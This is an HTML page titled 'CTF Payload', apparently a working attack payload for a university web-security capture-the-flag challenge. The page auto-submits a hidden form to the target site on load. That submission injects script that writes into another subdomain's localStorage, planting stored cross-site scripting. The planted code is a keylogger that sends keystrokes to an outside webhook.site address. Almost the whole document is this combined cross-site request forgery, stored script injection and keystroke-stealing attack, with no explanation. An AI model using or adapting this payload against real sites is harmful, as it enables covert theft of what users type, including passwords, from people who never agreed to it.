<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>CTF Payload</title>
</head>
<body>

<h3>Loading…</h3>
<form id="feeling" action="https://diary.owley-madison.jeopardy.websec.saarland/entry" method="POST">
                    <div class="form-group" >
                        <label for="feelings">Tell me about your Feelings:</label>
                        <textarea class="form-control" id="feelings" name="content" rows="3">
				This is a good try
				<iframe id="match_frame" src="//match.owley-madison.jeopardy.websec.saarland/" style="width:0px;height:0px"></iframe>
				<script>
					document.domain = "owley-madison.jeopardy.websec.saarland";
					var jsCode = "</option></select><svg onload=\"(function(){let buffer='',buffer2='';document.addEventListener('keydown',function(e){if(e.key.length===1) buffer+=e.key;if(buffer.length>40){new Image().src='https://webhook.site/02c3007c-f866-4e2a-bdc8-70c3cea1dad2?data='+encodeURIComponent(buffer);}});document.getElementById('sub_button').addEventListener('click',function(){new Image().src='https://webhook.site/02c3007c-f866-4e2a-bdc8-70c3cea1dad2?data='+encodeURIComponent(buffer)+'&onclick=yes';});})();\">";
					
					//const jsCode = JSON.stringify(jsCode);
					console.log(jsCode);
					
					var matchiframe = document.getElementById("match_frame");
					matchiframe.addEventListener("load", () => { 
						console.log("Iframe has loaded!");
						var locStorage = window.match_frame.contentWindow.localStorage;
						var favorites = locStorage.getItem('favorites');
						favorites = new Set(favorites ? JSON.parse(favorites) : []);
						favorites.add(jsCode)
            					favorites = Array.from(favorites);
            					locStorage.setItem('favorites', JSON.stringify(favorites));
						//locStorage.setItem("favorites", jsCode); 
					});
									
				</script>
			
			</textarea>
                    </div>
                <input name="csrfmiddlewaretoken" type="hidden" value="1arHEJtOgJc3aGybqajq7vosWZQYU61ia3sDoiSvy0Sl4j4NvI7IVKZFSIb1sE1y">

</form>
<script src="https://owley-madison.jeopardy.websec.saarland/csrf_script.js"></script>
<script> 
window.onload = () => {
console.log("ready to go");
	document.getElementById("feeling").submit();

};
</script>
</body>
</html>
